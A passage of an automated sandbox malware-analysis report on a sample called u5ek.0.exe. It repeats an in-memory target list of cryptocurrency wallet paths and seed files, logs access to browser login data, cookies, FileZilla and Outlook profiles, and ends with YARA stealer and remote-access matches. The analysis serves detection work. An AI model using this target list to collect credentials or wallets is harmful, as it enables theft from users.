Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: u5ek.0.exe, 00000001.00000002.2160907832.0000000004347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                          Source: Yara matchFile source: 4.2.cmd.exe.62500c8.8.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.cmd.exe.51400c8.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.cmd.exe.51400c8.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.cmd.exe.62500c8.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000015.00000002.2506629951.0000000005140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.2505942947.0000000001402000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2166598623.0000000006250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: u5ek.0.exe PID: 3484, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3488, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\xtfky, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jwjqeqx, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.3.u5ek.0.exe.5b60000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.u5ek.0.exe.40a0e67.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.2160554366.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000003.1664086896.0000000005B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2727cc40000.18.raw.unpack, type: UNPACKEDPE
